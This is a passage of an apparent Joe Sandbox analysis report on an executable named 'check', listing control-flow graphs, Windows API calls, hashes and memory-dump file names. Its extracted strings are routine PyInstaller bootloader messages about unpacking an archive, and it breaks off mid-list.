                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E516132A08A4386E720DF32D8815B96765BB68FA4F808935FA4DC7A97DF3CF5418740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                • Instruction ID: 603369393787bc3ece3f78dc7b294c0caa3d4f8e3bf3d5d134fb31a92a29d970
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74F0A432A18F4186FBA08F64B4887667350AB94B38F440635E97E826D5DF7CE4488A00

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 331 7ff61e8e1950-7ff61e8e198b call 7ff61e8e45c0 334 7ff61e8e1c4e-7ff61e8e1c72 call 7ff61e8ec550 331->334 335 7ff61e8e1991-7ff61e8e19d1 call 7ff61e8e7f90 331->335 340 7ff61e8e1c3b-7ff61e8e1c3e call 7ff61e8f004c 335->340 341 7ff61e8e19d7-7ff61e8e19e7 call 7ff61e8f06d4 335->341 345 7ff61e8e1c43-7ff61e8e1c4b 340->345 346 7ff61e8e19e9-7ff61e8e1a03 call 7ff61e8f4f08 call 7ff61e8e2910 341->346 347 7ff61e8e1a08-7ff61e8e1a24 call 7ff61e8f039c 341->347 345->334 346->340 352 7ff61e8e1a45-7ff61e8e1a5a call 7ff61e8f4f28 347->352 353 7ff61e8e1a26-7ff61e8e1a40 call 7ff61e8f4f08 call 7ff61e8e2910 347->353 361 7ff61e8e1a7b-7ff61e8e1b05 call 7ff61e8e1c80 * 2 call 7ff61e8f06d4 call 7ff61e8f4f44 352->361 362 7ff61e8e1a5c-7ff61e8e1a76 call 7ff61e8f4f08 call 7ff61e8e2910 352->362 353->340 375 7ff61e8e1b0a-7ff61e8e1b14 361->375 362->340 376 7ff61e8e1b35-7ff61e8e1b4e call 7ff61e8f039c 375->376 377 7ff61e8e1b16-7ff61e8e1b30 call 7ff61e8f4f08 call 7ff61e8e2910 375->377 382 7ff61e8e1b6f-7ff61e8e1b8b call 7ff61e8f0110 376->382 383 7ff61e8e1b50-7ff61e8e1b6a call 7ff61e8f4f08 call 7ff61e8e2910 376->383 377->340 391 7ff61e8e1b9e-7ff61e8e1bac 382->391 392 7ff61e8e1b8d-7ff61e8e1b99 call 7ff61e8e2710 382->392 383->340 391->340 395 7ff61e8e1bb2-7ff61e8e1bb9 391->395 392->340 397 7ff61e8e1bc1-7ff61e8e1bc7 395->397 398 7ff61e8e1be0-7ff61e8e1bef 397->398 399 7ff61e8e1bc9-7ff61e8e1bd6 397->399 398->398 400 7ff61e8e1bf1-7ff61e8e1bfa 398->400 399->400 401 7ff61e8e1c0f 400->401 402 7ff61e8e1bfc-7ff61e8e1bff 400->402 404 7ff61e8e1c11-7ff61e8e1c24 401->404 402->401 403 7ff61e8e1c01-7ff61e8e1c04 402->403 403->401 405 7ff61e8e1c06-7ff61e8e1c09 403->405 406 7ff61e8e1c2d-7ff61e8e1c39 404->406 407 7ff61e8e1c26 404->407 405->401 408 7ff61e8e1c0b-7ff61e8e1c0d 405->408 406->340 406->397 407->406 408->404
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E7F90: _fread_nolock.LIBCMT ref: 00007FF61E8E803A
                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF61E8E1A1B
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF61E8E1B6A), ref: 00007FF61E8E295E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                • Opcode ID: 935fd2eea7ebb7e39a44c0ac0c5bb94dcb31adeab0dcd688edef334786e7c957
                                                                                                                                                                                                                • Instruction ID: 95f233fd3296856e6f96b498ebe2401bb80d588c031f3218a51fe861ba638784
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 935fd2eea7ebb7e39a44c0ac0c5bb94dcb31adeab0dcd688edef334786e7c957
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11818171A08E8686EBA0DB15D0456F923E0EFA8F64F404431FA8EC7796DE3CF5858740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 409 7ff61e8e1600-7ff61e8e1611 410 7ff61e8e1613-7ff61e8e161c call 7ff61e8e1050 409->410 411 7ff61e8e1637-7ff61e8e1651 call 7ff61e8e45c0 409->411 416 7ff61e8e162e-7ff61e8e1636 410->416 417 7ff61e8e161e-7ff61e8e1629 call 7ff61e8e2710 410->417 418 7ff61e8e1653-7ff61e8e1681 call 7ff61e8f4f08 call 7ff61e8e2910 411->418 419 7ff61e8e1682-7ff61e8e169c call 7ff61e8e45c0 411->419 417->416 426 7ff61e8e169e-7ff61e8e16b3 call 7ff61e8e2710 419->426 427 7ff61e8e16b8-7ff61e8e16cf call 7ff61e8f06d4 419->427 433 7ff61e8e1821-7ff61e8e1824 call 7ff61e8f004c 426->433 434 7ff61e8e16d1-7ff61e8e16f4 call 7ff61e8f4f08 call 7ff61e8e2910 427->434 435 7ff61e8e16f9-7ff61e8e16fd 427->435 440 7ff61e8e1829-7ff61e8e183b 433->440 450 7ff61e8e1819-7ff61e8e181c call 7ff61e8f004c 434->450 438 7ff61e8e16ff-7ff61e8e170b call 7ff61e8e1210 435->438 439 7ff61e8e1717-7ff61e8e1737 call 7ff61e8f4f44 435->439 445 7ff61e8e1710-7ff61e8e1712 438->445 447 7ff61e8e1761-7ff61e8e176c 439->447 448 7ff61e8e1739-7ff61e8e175c call 7ff61e8f4f08 call 7ff61e8e2910 439->448 445->450 452 7ff61e8e1802-7ff61e8e180a call 7ff61e8f4f30 447->452 453 7ff61e8e1772-7ff61e8e1777 447->453 463 7ff61e8e180f-7ff61e8e1814 448->463 450->433 452->463 456 7ff61e8e1780-7ff61e8e17a2 call 7ff61e8f039c 453->456 464 7ff61e8e17a4-7ff61e8e17bc call 7ff61e8f0adc 456->464 465 7ff61e8e17da-7ff61e8e17e6 call 7ff61e8f4f08 456->465 463->450 471 7ff61e8e17c5-7ff61e8e17d8 call 7ff61e8f4f08 464->471 472 7ff61e8e17be-7ff61e8e17c1 464->472 470 7ff61e8e17ed-7ff61e8e17f8 call 7ff61e8e2910 465->470 478 7ff61e8e17fd 470->478 471->470 472->456 475 7ff61e8e17c3 472->475 475->478 478->452
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                • Opcode ID: de7b71eb3525e48ada22498f51af6936552d6781c49eee4e7825204e7cf27636
                                                                                                                                                                                                                • Instruction ID: 74b8b3610b36a744b56a79d26bf8cb2a29ef1b0f0bd00d6ae8a4bafd4f8b213e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: de7b71eb3525e48ada22498f51af6936552d6781c49eee4e7825204e7cf27636
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51518C21B08E4392EA90EB5698005E96390BFA4FB4F844932FE1DC77A6EE3CF5558340

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF61E8E3CBB), ref: 00007FF61E8E8704
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF61E8E3CBB), ref: 00007FF61E8E870A
                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00007FF61E8E3CBB), ref: 00007FF61E8E874C
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E8830: GetEnvironmentVariableW.KERNEL32(00007FF61E8E388E), ref: 00007FF61E8E8867
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF61E8E8889
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8F8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F8251
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E2810: MessageBoxW.USER32 ref: 00007FF61E8E28EA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                • Instruction ID: 80d929f23c011bd3c6d48898494b0411ea79267f2d7e8624e348f59be3afe7a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B41AE21B29E4245FA90EB66A9552FD5294AFA4FE0F884132FD0DD77DAEE3CF5018340

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 756 7ff61e8e1210-7ff61e8e126d call 7ff61e8ebd80 759 7ff61e8e126f-7ff61e8e1296 call 7ff61e8e2710 756->759 760 7ff61e8e1297-7ff61e8e12af call 7ff61e8f4f44 756->760 765 7ff61e8e12d4-7ff61e8e12e4 call 7ff61e8f4f44 760->765 766 7ff61e8e12b1-7ff61e8e12cf call 7ff61e8f4f08 call 7ff61e8e2910 760->766 772 7ff61e8e12e6-7ff61e8e1304 call 7ff61e8f4f08 call 7ff61e8e2910 765->772 773 7ff61e8e1309-7ff61e8e131b 765->773 777 7ff61e8e1439-7ff61e8e144e call 7ff61e8eba60 call 7ff61e8f4f30 * 2 766->777 772->777 776 7ff61e8e1320-7ff61e8e1345 call 7ff61e8f039c 773->776 785 7ff61e8e1431 776->785 786 7ff61e8e134b-7ff61e8e1355 call 7ff61e8f0110 776->786 793 7ff61e8e1453-7ff61e8e146d 777->793 785->777 786->785 792 7ff61e8e135b-7ff61e8e1367 786->792 794 7ff61e8e1370-7ff61e8e1398 call 7ff61e8ea1c0 792->794 797 7ff61e8e139a-7ff61e8e139d 794->797 798 7ff61e8e1416-7ff61e8e142c call 7ff61e8e2710 794->798 799 7ff61e8e139f-7ff61e8e13a9 797->799 800 7ff61e8e1411 797->800 798->785 802 7ff61e8e13d4-7ff61e8e13d7 799->802 803 7ff61e8e13ab-7ff61e8e13b9 call 7ff61e8f0adc 799->803 800->798 804 7ff61e8e13ea-7ff61e8e13ef 802->804 805 7ff61e8e13d9-7ff61e8e13e7 call 7ff61e909e30 802->805 809 7ff61e8e13be-7ff61e8e13c1 803->809 804->794 808 7ff61e8e13f5-7ff61e8e13f8 804->808 805->804 811 7ff61e8e13fa-7ff61e8e13fd 808->811 812 7ff61e8e140c-7ff61e8e140f 808->812 813 7ff61e8e13c3-7ff61e8e13cd call 7ff61e8f0110 809->813 814 7ff61e8e13cf-7ff61e8e13d2 809->814 811->798 815 7ff61e8e13ff-7ff61e8e1407 811->815 812->785 813->804 813->814 814->798 815->776
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                • Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                • Instruction ID: 236125ceec2b6a55a974adc561b5b03ac2cf66f9b099ae3265fea991e2212ca2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA519322A08E4285EAA19B16A4403FA6291FFA5FA4F844535FD4EC7BD6EE3CF545C700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF61E8FF0AA,?,?,-00000018,00007FF61E8FAD53,?,?,?,00007FF61E8FAC4A,?,?,?,00007FF61E8F5F3E), ref: 00007FF61E8FEE8C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF61E8FF0AA,?,?,-00000018,00007FF61E8FAD53,?,?,?,00007FF61E8FAC4A,?,?,?,00007FF61E8F5F3E), ref: 00007FF61E8FEE98
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                • Instruction ID: 5ecf09ba3fc20c45f0b3819bf9c3732b5730a33589d8b94544b3bd2aea7eba74
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3241C061B19E1281EA96DB16A81067522A5BF69FB0F894939FD1DC77C4EF3CF4458200

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF61E8E3804), ref: 00007FF61E8E36E1
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF61E8E3804), ref: 00007FF61E8E36EB
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF61E8E3706,?,00007FF61E8E3804), ref: 00007FF61E8E2C9E
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF61E8E3706,?,00007FF61E8E3804), ref: 00007FF61E8E2D63
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E2C50: MessageBoxW.USER32 ref: 00007FF61E8E2D99
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                • Instruction ID: d81795c65952d5a818897cead110940a50ae55d3be6a20c0e27cbeab09be352c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E42195A1F1CE8245FAA49B26EC153B62264BFA8F74F804636F95DC65D6EE2CF504C340

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 901 7ff61e8fba5c-7ff61e8fba82 902 7ff61e8fba84-7ff61e8fba98 call 7ff61e8f4ee8 call 7ff61e8f4f08 901->902 903 7ff61e8fba9d-7ff61e8fbaa1 901->903 919 7ff61e8fbe8e 902->919 905 7ff61e8fbe77-7ff61e8fbe83 call 7ff61e8f4ee8 call 7ff61e8f4f08 903->905 906 7ff61e8fbaa7-7ff61e8fbaae 903->906 922 7ff61e8fbe89 call 7ff61e8fa8e0 905->922 906->905 908 7ff61e8fbab4-7ff61e8fbae2 906->908 908->905 911 7ff61e8fbae8-7ff61e8fbaef 908->911 914 7ff61e8fbaf1-7ff61e8fbb03 call 7ff61e8f4ee8 call 7ff61e8f4f08 911->914 915 7ff61e8fbb08-7ff61e8fbb0b 911->915 914->922 917 7ff61e8fbe73-7ff61e8fbe75 915->917 918 7ff61e8fbb11-7ff61e8fbb17 915->918 923 7ff61e8fbe91-7ff61e8fbea8 917->923 918->917 924 7ff61e8fbb1d-7ff61e8fbb20 918->924 919->923 922->919 924->914 928 7ff61e8fbb22-7ff61e8fbb47 924->928 930 7ff61e8fbb7a-7ff61e8fbb81 928->930 931 7ff61e8fbb49-7ff61e8fbb4b 928->931 932 7ff61e8fbb83-7ff61e8fbbab call 7ff61e8fd5fc call 7ff61e8fa948 * 2 930->932 933 7ff61e8fbb56-7ff61e8fbb6d call 7ff61e8f4ee8 call 7ff61e8f4f08 call 7ff61e8fa8e0 930->933 934 7ff61e8fbb72-7ff61e8fbb78 931->934 935 7ff61e8fbb4d-7ff61e8fbb54 931->935 962 7ff61e8fbbad-7ff61e8fbbc3 call 7ff61e8f4f08 call 7ff61e8f4ee8 932->962 963 7ff61e8fbbc8-7ff61e8fbbf3 call 7ff61e8fc284 932->963 967 7ff61e8fbd00 933->967 936 7ff61e8fbbf8-7ff61e8fbc0f 934->936 935->933 935->934 939 7ff61e8fbc11-7ff61e8fbc19 936->939 940 7ff61e8fbc8a-7ff61e8fbc94 call 7ff61e90391c 936->940 939->940 943 7ff61e8fbc1b-7ff61e8fbc1d 939->943 953 7ff61e8fbd1e 940->953 954 7ff61e8fbc9a-7ff61e8fbcaf 940->954 943->940 947 7ff61e8fbc1f-7ff61e8fbc35 943->947 947->940 951 7ff61e8fbc37-7ff61e8fbc43 947->951 951->940 956 7ff61e8fbc45-7ff61e8fbc47 951->956 958 7ff61e8fbd23-7ff61e8fbd43 ReadFile 953->958 954->953 959 7ff61e8fbcb1-7ff61e8fbcc3 GetConsoleMode 954->959 956->940 961 7ff61e8fbc49-7ff61e8fbc61 956->961 964 7ff61e8fbe3d-7ff61e8fbe46 GetLastError 958->964 965 7ff61e8fbd49-7ff61e8fbd51 958->965 959->953 966 7ff61e8fbcc5-7ff61e8fbccd 959->966 961->940 972 7ff61e8fbc63-7ff61e8fbc6f 961->972 962->967 963->936 969 7ff61e8fbe63-7ff61e8fbe66 964->969 970 7ff61e8fbe48-7ff61e8fbe5e call 7ff61e8f4f08 call 7ff61e8f4ee8 964->970 965->964 974 7ff61e8fbd57 965->974 966->958 968 7ff61e8fbccf-7ff61e8fbcf1 ReadConsoleW 966->968 971 7ff61e8fbd03-7ff61e8fbd0d call 7ff61e8fa948 967->971 976 7ff61e8fbcf3 GetLastError 968->976 977 7ff61e8fbd12-7ff61e8fbd1c 968->977 981 7ff61e8fbe6c-7ff61e8fbe6e 969->981 982 7ff61e8fbcf9-7ff61e8fbcfb call 7ff61e8f4e7c 969->982 970->967 971->923 972->940 980 7ff61e8fbc71-7ff61e8fbc73 972->980 984 7ff61e8fbd5e-7ff61e8fbd73 974->984 976->982 977->984 980->940 989 7ff61e8fbc75-7ff61e8fbc85 980->989 981->971 982->967 984->971 991 7ff61e8fbd75-7ff61e8fbd80 984->991 989->940 994 7ff61e8fbd82-7ff61e8fbd9b call 7ff61e8fb674 991->994 995 7ff61e8fbda7-7ff61e8fbdaf 991->995 1001 7ff61e8fbda0-7ff61e8fbda2 994->1001 997 7ff61e8fbdb1-7ff61e8fbdc3 995->997 998 7ff61e8fbe2b-7ff61e8fbe38 call 7ff61e8fb4b4 995->998 1002 7ff61e8fbdc5 997->1002 1003 7ff61e8fbe1e-7ff61e8fbe26 997->1003 998->1001 1001->971 1005 7ff61e8fbdca-7ff61e8fbdd1 1002->1005 1003->971 1006 7ff61e8fbdd3-7ff61e8fbdd7 1005->1006 1007 7ff61e8fbe0d-7ff61e8fbe18 1005->1007 1008 7ff61e8fbdf3 1006->1008 1009 7ff61e8fbdd9-7ff61e8fbde0 1006->1009 1007->1003 1011 7ff61e8fbdf9-7ff61e8fbe09 1008->1011 1009->1008 1010 7ff61e8fbde2-7ff61e8fbde6 1009->1010 1010->1008 1012 7ff61e8fbde8-7ff61e8fbdf1 1010->1012 1011->1005 1013 7ff61e8fbe0b 1011->1013 1012->1011 1013->1003
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
